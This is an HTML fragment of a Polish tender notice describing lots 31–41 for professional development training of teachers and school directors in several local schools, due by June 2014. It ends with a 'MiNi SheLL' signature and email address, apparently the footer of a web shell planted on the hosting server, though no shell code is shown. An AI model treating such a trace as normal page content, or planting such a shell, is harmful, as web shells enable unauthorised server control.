<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Linowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nauczyciel 45 +
Doskonalenie nauczycieli w zakresie rozwoju osobistego.
Profilaktyka wypalenia zawodowego oraz radzenie sobie z jego objawami.
- przyczyny, objawy, fazy wypalenia zawodowego;
- sposoby radzenia sobie z wypaleniem zawodowym ;
- zasady zmniejszające prawdopodobieństwo zawodowego wypalania się.
Kreatywny nauczyciel - pobudzenie aktywności twórczej nauczycieli w organizacji procesu lekcyjnego.
- techniki pobudzające twórczość nauczycieli  służące zwiększeniu nowych pomysłów oraz ich lepszej jakości;
-  trening twórczości -  aktywizacja postawy twórczej w organizacji procesu lekcyjnego oraz wykorzystanie wiedzy zdobytej po realizacji części teoretycznej;
Wzmocnienie sił psychicznych i odporności na stres.
- konstruktywne  radzenie sobie ze stresem i wypaleniem zawodowym, tworzenie własnych strategii radzenia sobie w trudnych sytuacjach zawodowych; 
- budowanie i utrzymanie wysokiej motywacji zawodowej- identyfikacja własnych motywatorów  i de motywatorów  wewnętrzn.; 
Zwiększenie efektywności pracy nauczycieli w  klasach  łączonych.
- metody i formy pracy w klasach łączonych;
- organizacja procesu dydaktyczno-wychowawczego w klasach łączonych - warunki skutecznej pracy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 32 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Kałęczynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budowa koncepcji pracy szkoły
Wypracowanie spójnej koncepcji pracy szkoły, uwzględniającej aktualne potrzeby i oczekiwania szkoły i środowiska lokalnego.
Zasady budowy i modyfikacji koncepcji pracy szkoły.
Wypracowanie narzędzi służących  ewaluacji koncepcji pracy szkoły.
Zastosowanie  wyników ewaluacji do  modyfikacji  koncepcji pracy szkoły na rok 2014-2017..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 33 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej w Klonie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Postawy uczniowskie. Jak je kształtować?
Podniesienie kompetencji nauczycieli w zakresie postaw uczniowskich i możliwości ich kształtowania.
Opracowanie  standardów prowadzenia rozmów z rodzicami, z nauczycielami, z uczniami.
Jak skutecznie porozumiewać się z dorastającym dzieckiem?
Stworzenie banku materiałów pomocnych wychowawcom w zakresie kształtowania dobrej komunikacji i postawy współpracy wśród uczniów.
Organizacja indywidualizacji pracy na lekcji - rozwiązania metodyczne..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Marii Zientary-Malewskiej w Spychowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Postawy uczniowskie. Jak je kształtować?
Podniesienie kompetencji nauczycieli w zakresie postaw uczniowskich i możliwości ich kształtowania.
Nauczyciel wobec trudnych zachowań uczniów.
- zwiększenie zrozumienia przyczyn trudnych zachowań uczniów;
-  poznanie podstawowych typów charakterologicznych uczniów i umiejętności pracy z nimi;
- zwiększenie umiejętności budowania zdrowej relacji z, trudnym uczniem;
- poznanie strategii  efektywnych interwencji w sytuacjach niesubordynowanego zachowania uczniów
- diagnoza własnych zasobów i ograniczeń w pracy z uczniami sprawiającymi trudności.
Współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów.
- współpraca z rodzicami uczniów trudnych, motywowanie rodzica  do podejmowania oraz kontynuowania wspólnych działań;
- zasady i formy efektywnej współpracy z rodzicami uczniów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Ignacego Krasickiego w Świętajnie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Postawy uczniowskie. Jak je kształtować?
Podniesienie kompetencji nauczycieli w zakresie postaw uczniowskich i możliwości ich kształtowania.
Nauczyciel wobec trudnych zachowań uczniów.
Współpraca z rodzicami w kontekście współodpowiedzialności za kształtowanie postaw uczniów.
Wypracowanie narzędzi służących kształtowaniu postaw uczniów, zgodnych z systemem wartości promowanym w szkole oraz zgodnych z oczekiwaniami rodziców i środowiska.
Poznanie strategii radzenia sobie z trudnymi zachowaniami uczniów.
Poznawanie sprawdzonych narzędzi, technik oraz wskazówek skutecznego motywowania uczniów.
Konstruowanie systemów motywacyjnych, ułatwiających pracę z uczniem nadpobudliwym i zagrożonym niedostosowaniem społecznym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Jana Pawła II w Rozogach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uczeń - aktywny uczestnik procesu uczenia się.
Podniesienie umiejętności nauczycieli w zakresie uaktywnienia uczniów w procesie uczenia się.
Zachęcanie uczniów do czytania. Praca nad techniką czytania i zrozumieniem czytanego tekstu
- poznanie skutecznych metod i sposobów zachęcania uczniów do czytania;
- poznanie skutecznych  ćwiczeń doskonalących technikę czytania oraz umiejętność czytania ze zrozumieniem;
Jak uczyć umiejętności wynikających ze standardów wymagań kształcenia ogólnego w odniesieniu do realizacji podstawy programowej (brak spójności)?
- analiza spójności umiejętności wynikających ze standardów wymagań kształcenia ogólnego 
w odniesieniu do realizacji podstawy programowej;
- wskazówki do pracy w realizacji standardów  wymagań w odniesieniu do   podstawy programowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Doskonalenie pracy nauczycieli ze Szkoły Podstawowej im. Królowej Jadwigi w Wielbarku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykorzystanie TIK na zajęciach edukacyjnych - bezpieczny internet
Nabywanie wiedzy i praktycznych umiejętności w zakresie wykorzystania narzędzi TIK podczas zajęć edukacyjnych oraz nauka wykorzystywania zasobów sprzętowych szkoły.
Poznanie narzędzi TIK i innowacyjnych metod pracy wykorzystywanych podczas zajęć lekcyjnych, na  konkretnych przedmiotach.
Umiejętności praktyczne związane z obsługą narzędzi informatycznych, wykorzystywanie ich podczas prowadzenia zajęć dydaktycznych.
Wykorzystywania zasobów sprzętowych szkoły(dwie tablice interaktywne, 16 stanowisk komputerowych, 8 laptopów, kilka rzutników).
 Organizowanie lekcji otwartych pokazujących różne narzędzia i metody pracy oparte na wykorzystaniu nowoczesnych technologii oraz wspólne omawianie dobrych praktyk, zaistniałych trudności i problemów, związanych z wdrożeniem do szkolnej praktyki nowych umiejętności..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Doskonalenie pracy nauczycieli - Skuteczne sposoby zachęcania uczniów do czytania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Skuteczne sposoby zachęcania uczniów do czytania
 Nabycie umiejętności skutecznego zachęcania uczniów do czytania.
Poznanie nowoczesnych technologii, które można wykorzystać do skutecznego zachęcania uczniów do czytania 
- W jaki sposób wykorzystanie audiobooków, tabletów, adaptacji teatralnych, filmów, multimediów, internetu, może wpływać na postawy czytelnicze uczniów- propozycje z konkretnymi przykładami możliwości wymienionych środków technicznych lub innych.
a) Jak skutecznie zachęcać uczniów do czytania:
- Sposoby, metody skutecznego zachęcania  uczniów do czytania;
- Techniki pracy z uczniem z trudnościami w czytaniu;
- Zwiększanie motywacji uczniów do czytania;
b) Rozwijanie zainteresowań czytelniczych  uczniów z różnymi potrzebami edukacyjnymi:
- Jak diagnozować tempo i technikę czytania uczniów oraz ich poziom trudności w czytaniu?
- Jak indywidualizować metody związane z czytaniem, a tym samym zwiększać aktywność czytelniczą uczniów?.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Doskonalenie pracy nauczycieli - Jak rozwijać twórcze myślenie uczniów?.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak rozwijać twórcze myślenie uczniów?
Nabywanie wiedzy w zakresie rozwijania twórczego myślenia.
a) Jak stać się kreatywnym nauczycielem?;
b) Rozwijanie twórczej aktywności, kreatywności uczniów:
- Aktywne metody przekazywania wiedzy - zastosowanie w przekazywaniu wiadomości uczniom;
- Metody rozwijania kreatywności uczniów;
- Jak wdrażać ucznia do poszukiwania różnych sposobów rozwiązywania problemów;
- Jak zachęcać uczniów do samodzielnego poszukiwania wiadomości w różnych źródłach oraz krytycznego spojrzenia na nie.
a) Jak budować poczucie własnej wartości uczniów:
- Sposoby budowania wysokiego poczucia własnej wartości uczniów;
- Sposoby budowania postawy asertywnej uczniów;
- Zwiększanie motywacji uczniów do pracy;
b) Rozwijanie twórczej aktywności poznawczej uczniów z różnymi potrzebami edukacyjnymi:
- Jak diagnozować potrzeby uczniów oraz ich zainteresowania i upodobania?
- Jak indywidualizować proces nauczania podczas zajęć, a tym samym zwiększać zaangażowanie uczniów w pracę na lekcji?.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Doskonalenie pracy nauczycieli - Jak radzić sobie ze szkolną absencją? Bezpieczeństwo w szkole.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jak radzić sobie ze szkolną absencją? - bezpieczeństwo w szkole
 Nabycie umiejętności skutecznego radzenia sobie z absencją uczniów.
Absencja - poszukiwanie źródeł problemu
-przyczyny absencji, zdefiniowanie pojęcia i nazwanie problemu
-konsekwencje absencji
-najważniejsze obszary problemowe.
Diagnoza wewnątrzszkolna przyczyn absencji.
-analiza regulacji wewnątrzszkolnych dotyczących absencji w szkole
-jakie obszary szkolnej codzienności mogą podnosić współczynnik absencji?
-wypracowanie narzędzi do diagnozy zjawiska absencji
-przygotowanie uczestników do innych niż ankietowe badań absencji
-zastosowanie w praktyce wypracowanych sposobów radzenia sobie z absencją.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Doskonalenie pracy dyrektorów - Pozapedagogiczne obowiązki dyrektora szkoły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pozapedagogiczne obowiązki dyrektora szkoły
 Wzbogacenie wiedzy dyrektorów w zakresie pozapedagogicznych zadań.
Kontrola zarządcza i wynikające z niej obowiązki dyrektora
- kontrola zarządcza: narzędzia kontroli zarządczej i błędy dyrektora w jej wdrażaniu.
Obowiązki dyrektora szkoły w zakresie: ochrona danych osobowych, bhp w palcówce, prawo pracy-interpretacja przepisów obowiązki dyrektora w zakresie :ochrona danych osobowych w szkole ; kontrola GIODO, instrukcje związane z ochroną danych osobowych , SIO..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com